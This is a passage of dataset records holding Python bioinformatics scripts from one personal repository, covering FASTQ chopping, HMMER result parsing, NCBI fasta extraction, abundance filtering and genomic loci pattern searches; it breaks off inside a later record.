"alphanum_fraction": 0.5638827681541443,
"avg_line_length": 31.47747802734375,
"blob_id": "5fa05c05c3b5ddce308f7bfbdc78aeed71b95bec",
"content_id": "3d09d55aee62e139b0bd610af73a5731af56d92c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3616,
"license_type": "no_license",
"max_line_length": 730,
"num_lines": 111,
"path": "/misc/LociFinder.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Aug 28, 2017\n\n@author: javi\n\nThis script looks for loci that match some clustering pattern. for example, you can look for\nplaces where a certain group of samples cluster together. Another ver of this script might exist\nsomewhere but I've lost it. \n\n'''\nimport re \nfrom tkinter.tix import ROW\n\ndef loadTabNetwork(path):\n \n with open(path, 'r') as input:\n data = input.read()\n \n rows = re.split('\\n', data)[:-1]\n \n samplelist = re.split('\\t', rows[0])[2:]\n \n pos = []\n rowsplit = []\n for row in rows[1:]:\n tmp = re.split('\\t', row)\n pos.append(tmp[:2])\n rowsplit.append(tmp[2:])\n \n return samplelist, pos, rowsplit\n\ndef patternSearch(pattern, samplelist, data):\n '''pattern here is a 2D list specifying\n which samples are to be clustered together.\n data is the rowsplit'''\n \n def checkrow(row, idxs):\n if isinstance(idxs[0], list):\n if len(idxs) > 1:\n return checkrow(row, idxs[0]) and checkrow(row, idxs[1:])\n else:\n return checkrow(row, idxs[0])\n else:\n return len(set([row[x] for x in idxs])) == 1\n \n result = []\n \n idxs = [[samplelist.index(sample) for sample in row] for row in pattern]\n \n for i, row in enumerate(data):\n if checkrow(row, idxs): result.append(i)\n \n return result\n \n \n \n\ndef condense(rows, size = 1):\n #size now refer to the min size that will count, default 0\n \n results = []\n \n size = size - 1\n pre = 0\n cur = 0\n for row in rows:\n \n if pre == 0:\n pre = row\n cur = row \n\n elif (row - cur) != 1:\n if (cur - pre) > size:\n results.append((pre, cur))\n pre = row\n cur = row\n \n else: cur = row \n \n results.append((pre, row))\n \n return results\n\nif __name__ == '__main__':\n \n directory = '/d/data/neis/results7_d3/cytoscape'\n filename = 'tabNetwork.tsv'\n outname = 'loci.txt'\n \n print('starting!')\n \n# pattern = [[\"3502\",\"ATL_2011_05-13\",\"GCGS011\",\"GCGS012\",\"GCGS018\",\"GCGS062\",\"GCGS084\",\"GCGS100\",\"GCGS128\",\"GCGS144\",\"GCGS167\",\"GCGS173\",\"GCGS174\",\"GCGS176\",\"GCGS192\",\"GCGS193\",\"GCGS197\",\"GCGS198\",\"GCGS201\",\"GCGS202\",\"GCGS203\",\"GCGS204\",\"GCGS207\",\"GCGS209\",\"GCGS211\",\"GCGS213\",\"GCGS215\",\"GCGS217\",\"GCGS224\",\"GCGS226\",\"MU_NG19\",\"MU_NG20\",\"MU_NG3\",\"MU_NG8\",\"NOR_2011_03-06\",\"SK-92-679\",\"USO_BE10-065\",\"USO_DK11-110\",\"USO_G09-060\",\"USO_G09-145\",\"USO_G13-777\",\"USO_GC3828\",\"USO_GC3831\",\"USO_GC3839\",\"USO_GC3861\",\"USO_GC3863\",\"USO_GC3868\",\"USO_GC3877\",\"USO_GC3879\",\"USO_GE12-070\",\"USO_GR10-009\",\"USO_GR13-015\",\"USO_IE11027\",\"USO_IE11068\",\"USO_IE12-018\",\"USO_NL10-083\",\"USO_NL11143\",\"USO_NO10-026\",\"USO_NO2013-031\",\"USO_SI12-018\"]]\n \n# pattern = [[\"32867\", \"GCGS044\", \"GCGS116\", \"GCGS134\", \"MIA_2011_05-16\", \"USO_SP09-048\", \"USO_SP09-062\", \"ALB_2011_03_03\", \"GCGS146\", \"GCGS210\", \"GCGS212\", \"GCGS216\"]]\n\n pattern = [['DK09-023', 'PID1', 'PID18', 'PID24-1', 'PID332']]\n \n samplelist, pos, data = loadTabNetwork('/'.join([directory, filename]))\n rows = patternSearch(pattern, samplelist, data)\n \n crows = condense(rows, 2)\n \n print(crows)\n \n with open('/'.join([directory, outname]), 'w') as output:\n for crow in crows:\n pre = pos[crow[0]]\n post = pos[crow[1]]\n output.write('{0}\\t{1}\\t--\\t{2}\\t{3}\\n'.format(pre[0], pre[1], post[0], post[1]))\n \n print('loci finder finished with {0} results'.format(len(crows))) \n \n \n"
},
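For reference, a hand-traced sketch of condense() from LociFinder.py above; the import assumes misc/ is on sys.path, and the rows are invented:

```python
from LociFinder import condense  # assumes misc/ is on sys.path

# Consecutive row indices collapse to (start, end) runs; runs shorter than
# `size` are dropped, except the final run, which is appended unconditionally.
rows = [1, 2, 3, 7, 8, 10]
print(condense(rows, 2))  # [(1, 3), (10, 10)]
```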
{
"alpha_fraction": 0.5203045606613159,
"alphanum_fraction": 0.5262267589569092,
"avg_line_length": 23.14285659790039,
"blob_id": "97aadca3ddb46622a5aa0e729636507fb6f9759d",
"content_id": "ad8ba54c937855b1fa46850ecf7f4456d7d7c591",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1182,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 49,
"path": "/ConsensusChopper/FqFormatter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Sep 23, 2013\n\n@author: javi\n'''\n\n'''FastA to FastQ!'''\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\nfrom .FqBlock import FqBlock\nfrom Bio import SeqIO\n\ndef format(directory, f):\n with open(f, 'r') as source:\n data = source.read()\n re.findall(\">.+?\\n(.+)(?:[>]|$)\")\n\nif __name__ == '__main__':\n #modify these as needed\n directory = ''\n \n #Do not modify\n os.chdir(directory) \n \n if not (os.path.isdir(directory + \"/Formatted\")):\n os.mkdir(\"Formatted\")\n \n chopdirectory = directory + \"/Formatted\"\n \n log = open(chopdirectory + \"/log.txt\", \"w\")\n log.write(\"Run inputs are: \\n%s\" % (directory))\n \n onlyfiles = [ f for f in listdir(directory) if isfile(join(directory,f)) ]\n for f in onlyfiles:\n print(\"\\nProcessing %s ...\" % f)\n log.write(\"\\nProcessing %s ... \" % f)\n \n try: \n if f.split(\".\")[1] == \"fasta\":\n format(directory, f)\n else:\n log.write(\"\\n%s is not a fq file\" % f)\n except:\n log.write(\"\\n%s is not a fq file\" % f)\n \n \n print(\"\\nend of script\")"
},
{
"alpha_fraction": 0.5318664908409119,
"alphanum_fraction": 0.5493171215057373,
"avg_line_length": 24.852941513061523,
"blob_id": "36bfda00c46304616b05cbf7f019e8a4bfa1d670",
"content_id": "cdbda2e9557a0d14f164112ca99b417a16f80789",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2636,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 102,
"path": "/misc/AnalyzeTabNetwork.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jan 26, 2018\n\n@author: javi\n\nFind shared regions in between samples in tab network\n'''\nimport re\n\nglobal targets\n\ndef readHeader(line):\n '''reads the header of tab network, returns a sample list'''\n \n split = re.split('\\t', line.rstrip())\n \n return split[2:]\n\ndef readLine(line):\n '''takes one line, returns a dictionary with {chr, pos, [data]}'''\n\n split = re.split('\\t', line.rstrip())\n chr = split[0]\n pos = split[1]\n data = split[2:]\n \n return {'chr':chr, 'pos':pos, 'data':data}\n\ndef isShared(lineobj, inds):\n '''takes a line dictionary, returns t/f'''\n \n data = lineobj['data']\n rel = [data[i] for i in inds] #relevant data\n \n if(len(rel) == 0):\n raise Exception('isShared: no data in line')\n \n \n return len(set(rel)) <= 2 and rel.count(rel[0]) != 2\n \ndef isSelf(lineobj, ind, color):\n '''like is shared, but looks for self-color''' \n \n data = lineobj['data']\n rel = data[ind] #relevant data\n \n \n try:\n return rel == color\n except:\n raise Exception('isShared: no data in line')\n \n \nif __name__ == '__main__':\n\n# target = 'BE11-020'\n# color = '#003FFF'\n directory = 'D:/documents/data/neis'\n# filepath = 'tabNetwork.tsv'\n# outpath = 'shared.txt'\n# \n# results = []\n# total = 0\n# \n# with open('/'.join([directory, filepath]), 'r') as f:\n# \n# sampleList = readHeader(f.readline())\n# target_ind = sampleList.index(target)\n# \n# for line in f:\n# parsed = readLine(line)\n# total += 1\n# if(isSelf(parsed, target_ind, color)):\n# results.append(parsed)\n# \n# print('{0} self out of total of {1}'.format(len(results), total))\n\n# list = green: '#00FF3F' yellow: '#FFBF00' blue: '#003FFF' pink: '#FF00BF'\n\n# for the old one, where you looked for shared stuff between samples\n targets = ['DK12-38', 'BE11-020']\n# directory = '/data/new/javi/neis/results2/cytoscape'\n filepath = 'tabNetwork.tsv'\n outpath = 'shared.txt'\n \n results = []\n \nwith open('/'.join([directory, filepath]), 'r') as f:\n \n sampleList = readHeader(f.readline())\n target_inds = [sampleList.index(x) for x in targets]\n \n for line in f:\n parsed = readLine(line)\n if(isShared(parsed, target_inds)):\n results.append(parsed)\n \nwith open('/'.join([directory, outpath]), 'w') as f:\n \n for r in results:\n f.write('\\t'.join([r['chr'], r['pos']] + [r['data'][x] for x in target_inds]))\n f.write('\\n')"
},
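A small sketch of the line parser in AnalyzeTabNetwork.py above, on an invented tabNetwork row (the colours follow the palette noted in the script's comments):

```python
from AnalyzeTabNetwork import readLine  # assumes misc/ is on sys.path

line = "chr1\t1234\t#00FF3F\t#FFBF00\n"
print(readLine(line))
# {'chr': 'chr1', 'pos': '1234', 'data': ['#00FF3F', '#FFBF00']}
```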
{
"alpha_fraction": 0.49948611855506897,
"alphanum_fraction": 0.5066803693771362,
"avg_line_length": 19.44444465637207,
"blob_id": "2c2e76a4dc31b866864a46876acf490420c9ab42",
"content_id": "0351a8ac53dda8f1f1a4f4941c4905f940576ed9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 973,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 45,
"path": "/misc/RecursiveTouch.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on Jan. 12, 2019\r\n\r\n@author: javi\r\n\r\nrecursively touches everything that fits some criteria under a folder.\r\n'''\r\nimport pathlib\r\nimport re\r\n\r\ndef check(name):\r\n '''\r\n checks if a file fits the criteria. modify each time as needed\r\n '''\r\n \r\n patterns = ['.sh', '.fastq']\r\n for p in patterns:\r\n if re.search(p, str(name)):\r\n return True\r\n \r\n return False\r\n\r\ndef recursiveTouch(path):\r\n '''path is a directory'''\r\n \r\n for x in path.iterdir():\r\n if x.is_dir():\r\n recursiveTouch(path/x)\r\n \r\n else:\r\n if check(x):\r\n x.touch()\r\n else:\r\n print('skipping ' + str(x))\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n dir = sys.argv[1]\r\n path = pathlib.Path(dir)\r\n if path.is_dir():\r\n recursiveTouch(path)\r\n else:\r\n raise(FileNotFoundError('this isnt even a directory'))\r\n \r\n print('done!') \r\n "
},
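A usage sketch for check() above; the file names are invented:

```python
from RecursiveTouch import check  # assumes misc/ is on sys.path

print(check('run_all.sh'))   # True  -- matches the \.sh pattern
print(check('reads.fastq'))  # True
print(check('notes.txt'))    # False
```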
{
"alpha_fraction": 0.5309684872627258,
"alphanum_fraction": 0.539977490901947,
"avg_line_length": 24.028169631958008,
"blob_id": "69644b27fa955fb8e593fcc82977bfd4981f8815",
"content_id": "cb087ccee18dcbf56b846c17c160bcc66e272aac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1776,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 71,
"path": "/misc/ASVfilter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 4, 2018\n\n@author: Javi\n'''\nimport re \n\ndef filter_tsv(data, n):\n '''\n filters an abundance file for the top n, returns as a list of lines\n also returns the id of the ASVs retained for the fsa filter\n '''\n \n def abu_sum(line):\n split = re.split('\\t', line)\n vals = [float(x) for x in split[1:]]\n return sum(vals)\n \n def getname(line):\n split = re.split('\\t',line)\n return split[0]\n \n lines = re.split('\\n', data)[:-1] #there'll be an empty line in the end\n \n header = lines[:2]\n rest = sorted(lines[2:], key=abu_sum, reverse=True)[:n]\n names = [getname(x) for x in rest]\n \n return header + rest, names\n \n \ndef filter_fsa(data, names):\n '''\n takes a fasta, removes any names that don't appear in names\n return as a list of lines\n '''\n \n def check_name(entry):\n name = re.search('>(.+?)\\n', entry).group(1)\n return name in names\n \n seqs = re.split('\\n(?=>)', data)\n \n return filter(check_name, seqs)\n \n \n \n\nif __name__ == '__main__':\n directory = 'D:/cbw'\n prefix = '16S'\n \n fsa = '/'.join([directory, prefix]) + \".fasta\"\n abu = '/'.join([directory, prefix]) + \".tsv\"\n \n fsa_outpath = '/'.join([directory, prefix]) + \"_filtered.fasta\"\n abu_outpath = '/'.join([directory, prefix]) + \"_filtered.tsv\"\n \n with open(abu, 'r') as input:\n tsv_out, names = filter_tsv(input.read(), 100)\n \n with open(abu_outpath, 'w') as output:\n output.write('\\n'.join(tsv_out))\n \n with open(fsa, 'r') as input:\n fsa_out = filter_fsa(input.read(), names)\n \n with open(fsa_outpath, 'w') as output:\n output.write('\\n'.join(fsa_out))\n \n print('done!')"
},
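A hand-checked sketch of filter_tsv() above on an invented two-sample abundance table (two header lines, then one row per ASV):

```python
from ASVfilter import filter_tsv  # assumes misc/ is on sys.path

data = ("#constructed\nASV\ts1\ts2\n"
        "asv1\t5\t5\n"
        "asv2\t100\t1\n"
        "asv3\t1\t1\n")
lines, names = filter_tsv(data, 2)
print(names)  # ['asv2', 'asv1'] -- the two ASVs with the highest totals
```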
{
"alpha_fraction": 0.5349514484405518,
"alphanum_fraction": 0.5451456308364868,
"avg_line_length": 34.39655303955078,
"blob_id": "b77b78ff19049131edd4e4093698862ebe3c8111",
"content_id": "32ac543fca64929373def3fc8ddaf909a6ac442c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4120,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 116,
"path": "/Proteins/SequenceSelect.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 18, 2014\n\n@author: javi\n'''\n'''picks out the sequences from the fasta file that were hits in the HMM search. \n\nOverview:\n\nRequires: filename, identifying the strain. Folder of all the fastas. folder with all hmmr files. \n\n1. read the hmmr files, get name + id of all proteins\n2. for each protein id, look in the corresponding fasta file and grab that chunk. \n3. append the stain name to the front of the protein ID so it'd be like ARI_TGME49_27900\n4. write one file for each strain.\n'''\nimport re\nimport os \n'''String -> (name, list)\nreads the HMMR file'''\ndef parseHMMR(filepath):\n with open(filepath, 'r') as input:\n data = input.read()\n proteins = re.findall(\"(?m)^>>((.+?)\\s+.+)$\", data)\n print(\"{0} proteins read from {1}\".format(len(proteins), re.match(\"^(.+?)[.].+$\", filepath).group(1)))\n return proteins\n\n'''String, list -> list\nthe returned list already have the strain name attached to it''' \ndef findSequences(fastaFilepath, seqList, strain):\n with open(fastaFilepath, 'r') as input:\n data = input.read()\n results = []\n for protein in seqList:\n ID = \">{0}\".format(protein[0])\n seq = re.search(\"(?s)>{0}\\s.+?\\n(.+?)(?=\\n>|$)\".format(protein[1]), data).group(1)\n results.append(\"\\n\".join([ID, seq]))\n return results\n \n'''string, list -> none (output)\nwrites the fasta files'''\ndef writeFasta(filepath, list):\n with open(filepath, 'w') as output:\n output.write(\"\\n\".join(list))\n print(\"{0} proteins wrote to {1}\".format(len(list), re.match(\"^(.+?)[.].+$\", filepath).group(1)))\n\n'''string, string, string, string -> none (output)\nprimary running method for this script'''\ndef select(hmmrpath, fastapath, outputpath, strain):\n seqList = parseHMMR(hmmrpath)\n sequences = findSequences(fastapath, seqList, strain)\n writeFasta(outputpath, sequences)\n\n\n\ndef filter(filepath, outpath):\n with open(filepath) as input, open(outpath, 'w') as output:\n data = input.read()\n lines = re.split(\"\\n\", data)\n results = []\n for index, line in enumerate(lines):\n good = [\"Group_{0}:\".format(index+1)]\n try:\n removeHeader = re.match(\"^.+?: (.+)$\", line).group(1)\n except:\n continue\n elements = re.split(\"\\s\", removeHeader)\n for e in elements:\n if not re.match(\"^ham\", e):\n good.append(e)\n results.append(good)\n \n print(\"filtered {0} lines\".format(index))\n \n count = 0\n for line in results:\n output.write(\" \".join(line) + \"\\n\")\n \ndef toName(filepath, hmmrDirectory, outpath):\n hmmrFiles = [ x for x in os.listdir(hmmrDirectory) if os.path.isfile(\"/\".join([hmmrDirectory,x]))]\n proteins = []\n proteinDict = {}\n for f in hmmrFiles:\n proteins += parseHMMR(\"/\".join([hmmrDirectory,f]))\n for protein in proteins:\n proteinDict[protein[1]] = re.search(\"\\s+?(\\w.+)$\", protein[0]).group(1)\n \n with open(filepath) as input, open(outpath, 'w') as output:\n data = input.read()\n lines = re.split(\"\\n\", data)\n results = []\n for index, line in enumerate(lines):\n try:\n removeHeader = re.match(\"^.+?: (.+)$\", line).group(1)\n except:\n continue\n elements = re.split(\"\\s\", removeHeader)\n results.append([re.split(\"[|]\", x) for x in elements])\n \n for line in results:\n towrite = []\n lineNames = []\n for element in line:\n strain = element[0]\n name = proteinDict[element[1]]\n \n srs = re.search(\"SRS.*$\", name)\n if srs:\n name = srs.group(0)\n \n if name in lineNames:\n name = \"-\"\n else: lineNames.append(name)\n towrite.append(\"{1}_{0}\".format(strain, name))\n \n 
output.write(\",\".join(towrite) + \"\\n\")\n\n \n "
},
{
"alpha_fraction": 0.46076643466949463,
"alphanum_fraction": 0.4689781069755554,
"avg_line_length": 23.377777099609375,
"blob_id": "b4ea031f632b7ef8c7ebc9a711ef20c3f9799cb3",
"content_id": "20bc36f770a59bc3a8eafa94f97107741a837407",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1096,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 45,
"path": "/misc/SequenceNumberCounter.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "import re\n\n\n\ndef parse(inpath):\n \n with open(inpath, 'r') as input:\n \n results = {} \n \n for i, line in enumerate(input):\n try:\n date = re.split('\\t', line)[14]\n year = int(re.split('/', date)[0])\n try:\n results[year] += 1\n except:\n results[year] = 0\n except:\n if(i==0): pass\n else:\n print('{0} gave an error!'.format(line))\n \n return results\n\n\ndef output(results, outpath):\n \n with open(outpath, 'w') as output:\n output.write('year\\tcount\\n')\n for key in sorted(results.keys()):\n output.write('{0}\\t{1}\\n'.format(key, results[key]))\n\nif __name__ == \"__main__\":\n directory = '/d/data'\n filename = 'eukaryotes.txt'\n inpath = '/'.join([directory, filename])\n outname = 'euseqnums.tsv'\n outpath = '/'.join([directory, outname])\n \n results = parse(inpath)\n \n output(results, outpath)\n \n print('seqnumcount complete.')"
},
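The per-year tally above is the textbook case for collections.Counter; a minimal equivalent sketch on invented 'year/month' values:

```python
from collections import Counter

dates = ["2001/05", "2001/07", "2003/01"]  # illustrative date strings
counts = Counter(int(d.split("/")[0]) for d in dates)
print(sorted(counts.items()))  # [(2001, 2), (2003, 1)]
```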
{
"alpha_fraction": 0.5241614580154419,
"alphanum_fraction": 0.5289937257766724,
"avg_line_length": 32.19811248779297,
"blob_id": "f081b6558e13112cd77997d482a2a33d94cf4c3e",
"content_id": "9ff4d3cd42c0f8c2c4db7cb89de5d07495d2790b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3518,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 106,
"path": "/ConsensusChopper/ConsensusChopper.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Sep 16, 2013\n\n@author: javi\n'''\n\n# Breaks a given FQ sequence into 150 bp fragments, with 50bp overlab on either side.\n# Input: name of fastq file\n# Output: chopped up fastq file, separate copy, in a subfolder called \"Chopped\"\n# Notes: Only works for fastQ!\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\nfrom .FqBlock import FqBlock\n \n \n\n \ndef chop(directory, chopdirectory, sourcename, identifier, length, overlap, newlog):\n# initialize\n\n nextblockid = \"\"\n \n with open(sourcename, \"r\") as source:\n print(\"\\nreading file %s ...\" % sourcename)\n data = source.read()\n print(\"done.\")\n \n with open(\"%s/%s-chopped.fq\" % (chopdirectory, sourcename.split(\".\")[0]), \"w\") as product:\n \n # identifying blocks. Each block processes and writes itself into the file.\n eof = False\n currentblock = FqBlock(length, overlap)\n \n while(not eof):\n g = re.match(\"(?is)(@%s.*?)\\n([a-zA-Z\\n]*?)\\n\\+\\n(.*?)(@%s.*)\" % (identifier, identifier), data)\n if not g:\n g = re.match(\"(?is)(@%s.*?)([a-zA-Z\\n]*?)\\n\\+\\n(.*?)$\" % (identifier), data)\n eof = True\n currentblock.setSeqid(g.group(1))\n currentblock.setSequence(g.group(2).replace('\\n', ''))\n currentblock.setQscore(g.group(3).replace('\\n', ''))\n currentblock.write(product)\n try:\n data = g.group(4)\n except:\n log.write(\"\\n%s reached eof\" % sourcename)\n \n \n# currentblock.reset()\n# currentblock.setSeqid(nextblockid)\n# inblock = True\n# \n# while(inblock):\n# temp = source.readline()\n# # print temp\n# if (re.match(\"@\" + identifier + \".*?\\n\", temp) or temp == \"\"):\n# inblock = False\n# if not currentblock.seqid == \"\":\n# currentblock.write(product)\n# nextblockid = temp.rstrip('\\n')\n# \n# else:\n# currentblock.addRaw(temp.rstrip('\\n'))\n# \n# if temp == \"\":\n# eof = True \n \n\n\nif __name__ == '__main__':\n #modify these as needed\n directory = input(\"Please specify working directory, in full \\n\")\n identifier = input(\"Please input sequence identifier, not including the @ symbol \\n\")\n length = eval(input(\"Please specify the length of moving window \\n\"))\n overlap = eval(input(\"Please specify the length of overlap \\n\"))\n \n #Do not modify\n os.chdir(directory) \n \n if not (os.path.isdir(directory + \"/Chopped\")):\n os.mkdir(\"Chopped\")\n \n chopdirectory = directory + \"/Chopped\"\n \n log = open(chopdirectory + \"/log.txt\", \"w\")\n log.write(\"Run inputs are: \\n%s\\n%s\\n%s\\n%s\\n\" % (directory, identifier, length, overlap))\n \n onlyfiles = [ f for f in listdir(directory) if isfile(join(directory,f)) ]\n for f in onlyfiles:\n print(\"\\nProcessing %s ...\" % f)\n log.write(\"\\nProcessing %s ... \" % f)\n \n try: \n namesplit = f.split(\".\")\n if namesplit[len(namesplit)-1] == \"fq\":\n chop(directory, chopdirectory, f, identifier, length, overlap, log)\n else:\n log.write(\"\\nerror, %s is not a fq file\" % f)\n except:\n log.write(\"\\nerror, %s is not a fq file\" % f)\n \n \n print(\"\\nend of script\")"
},
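The chopper's moving window advances by (length - overlap) bp per fragment, so the expected fragment count per read can be sanity-checked with a short formula (editorial sketch; n_windows is not part of the repo):

```python
import math

def n_windows(read_len, length, overlap):
    # one full window, then one more per (length - overlap) bp step
    if read_len <= length:
        return 1
    return 1 + math.ceil((read_len - length) / (length - overlap))

print(n_windows(16, 10, 3))  # 2, matching FqBlock.build() on a 16 bp read
```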
{
"alpha_fraction": 0.4599524140357971,
"alphanum_fraction": 0.46629658341407776,
"avg_line_length": 28.547618865966797,
"blob_id": "ae41f63e94889ef7e2afa14bddb4fe442ffdfbec",
"content_id": "0c5c9ab6a5b7d88e2e446e61078eca6aa65969e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 42,
"path": "/misc/NCBIExtractor.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Mar 15, 2017\n\nCompanion of NCBIDownloader, extracts the fastas generated\n\n@author: javi\n'''\n\nif __name__ == '__main__':\n \n from os import chdir, mkdir, scandir\n import re\n from subprocess import check_output\n \n directory = '/data/new/javi/neis/ngo2'\n outpath = '/data/new/javi/neis/ngo_fasta'\n \n chdir(directory)\n \n try:\n mkdir(outpath)\n except Exception:\n print(Exception)\n \n for entry in scandir():\n \n if entry.is_dir():\n \n files = scandir(entry.name)\n name = re.sub(' ', '', entry.name) + '.fasta'\n \n for file in files:\n fn = file.name\n if not (re.search('_cds_', fn) or re.search('_rna_', fn)) and fn.endswith('genomic.fna.gz'):\n print(fn)\n fsa = check_output(['gzip', '-cd', '/'.join([entry.name, fn])])\n# print(' '.join(['gzip', '-cd', '/'.join([entry.name, fn]), '|', 'cat', '>', '/'.join([outpath, name])]))\n \n with open('/'.join([outpath, name]), 'w') as output:\n output.write(fsa.decode(\"utf-8\"))\n break\n print('Done!')\n "
},
{
"alpha_fraction": 0.6269875168800354,
"alphanum_fraction": 0.6407391428947449,
"avg_line_length": 32.014183044433594,
"blob_id": "e196c67fc24e7b7320bbbdf42461675d438276e0",
"content_id": "3f3136eee7344cd414177bd3f756982d5c775813",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4654,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 141,
"path": "/Proteins/DomainFamily.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 13, 2014\n\n@author: javi\n'''\n\n'''contains routines for choosing the best family from HMM searches using different\nprofiles. '''\nimport re\n\n\n'''tree, tree -> tree\nmerges the information in target and source, which represent\nsearch result using two profiles. Picks the best family of the two'''\ndef update(new, current):\n for proteinID, proteinInfo in new.items():\n if proteinID in current:\n for domain, score in proteinInfo.items():\n current[proteinID] = updateDomains(score, current[proteinID])\n else:\n current[proteinID] = proteinInfo\n return current\n\n'''tuple, dict -> dict\nprimary method for updating a domain. runs the other parts'''\ndef updateDomains(newDomain, currentProtein):\n decision = choosePosition(newDomain, currentProtein)\n if decision[1] == True:\n score = newDomain[1]\n oldScore = currentProtein[decision[0]][1]\n if score < oldScore: #smaller score is better\n currentProtein[decision[0]] = newDomain\n else:\n currentProtein = place(newDomain, currentProtein, decision[0])\n return currentProtein\n \n \n'''tuple, dict, int -> dict\nplaces the given domain at the appropriate index, and update all other indices'''\ndef place(newDomain, oldDomains, index):\n for domain in sorted(oldDomains.keys()[index-1:], reverse=True):\n oldDomains[domain+1] = oldDomains[domain]\n oldDomains[index] = newDomain\n return oldDomains\n\n'''int, list of ints -> int\nreturns a or b, whichever one is closer to the query'''\ndef closest(query, list):\n results = [(abs(query-x), index) for index, x in enumerate(list)]\n return list[sorted(results)[0][1]]\n\n'''tuple, dict -> (int, bool)\nreturns the index of where it should go, and whether its a replace or insert (True for replace)'''\ndef choosePosition(newDomain, currentProtein):\n oldCoords = [x[1][2] for x in sorted(currentProtein.items())]\n newCoords = newDomain[2]\n \n starts = [x[0] for x in oldCoords]\n ends = [x[1] for x in oldCoords]\n \n startClosest = closest(newCoords[0], starts+ends)\n endClosest = closest(newCoords[1], starts+ends)\n \n #prediction based on start\n if startClosest in starts:\n sPrediction = (starts.index(startClosest)+1, True)\n else:\n sPrediction = (ends.index(startClosest)+2, False)\n \n #prediction based on end\n if endClosest in ends:\n ePrediction = (ends.index(endClosest)+1, True)\n else:\n ePrediction = (starts.index(endClosest)+1, False)\n\n #pick one\n \n #ends\n if startClosest == endClosest:\n if startClosest in starts:\n return ePrediction\n elif endClosest in ends:\n return sPrediction\n #both predictions would be wrong\n elif newCoords[0] < startClosest and newCoords[1] > endClosest:\n return (sPrediction[0], True)\n elif sPrediction == ePrediction:\n return sPrediction\n elif startClosest in starts:\n return sPrediction\n elif endClosest in ends:\n return ePrediction\n else:\n raise Exception('unable to choose')\n\n\n'''list of trees -> tree\n\nrefer to HMMParser for the tree structure. 
\nMain running method for choosing the best family'''\ndef choose(treeList):\n base = treeList[0]\n others = treeList[1:]\n for other in others:\n base = update(other, base)\n return base\n\n'''tree -> None(print)\n\nprints a tree to file in a legible format'''\ndef printTree(tree, filepath):\n with open(filepath, \"w\") as output:\n count = 0\n for proteinID, proteinInfo in tree.items():\n output.write(\">>{0}\\n\".format(proteinID))\n count += 1\n for domain, info in proteinInfo.items():\n family, score, length, cys, degen = info\n output.write(\"\\tDomain {0:>3} Family {1} Coords {3:>7} Cys {4:>2} Degen {5:>5} Score {2}\\n\".format(domain, family, score, \"-\".join([str(length[0]),str(length[1])]), cys, str(degen)))\n print(\"{0} has {1} proteins\".format(re.match(\"^.+/(.+?)$\", filepath).group(1), count))\n \n# '''tree -> tree\n# \n# prunes the current tree according to rules. Current rules are two of the three from the paper:\n# \n# e-value < 1e-5\n# at least 90 in length\n# '''\n# def prune(tree):\n# for proteinID, proteinInfo in tree.items():\n# for domainID, domainInfo in proteinInfo.items():\n# score = domainInfo[1]\n# length = domainInfo[2]\n# if score > 0.00001 or length < 90:\n# del tree[proteinID][domainID]\n\n'''trees -> None (output)\n\ncomputes some stats about this tree'''\ndef summary(tree):\n pass"
},
{
"alpha_fraction": 0.5399484634399414,
"alphanum_fraction": 0.5644329786300659,
"avg_line_length": 24.733333587646484,
"blob_id": "037b9692fdc229472e571458609c3abc01d6c0a4",
"content_id": "d21283a84de828e355348eff8ffa6de3d97741b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 776,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 30,
"path": "/misc/MergePaired.py",
"repo_name": "xescape/scripts",
"src_encoding": "UTF-8",
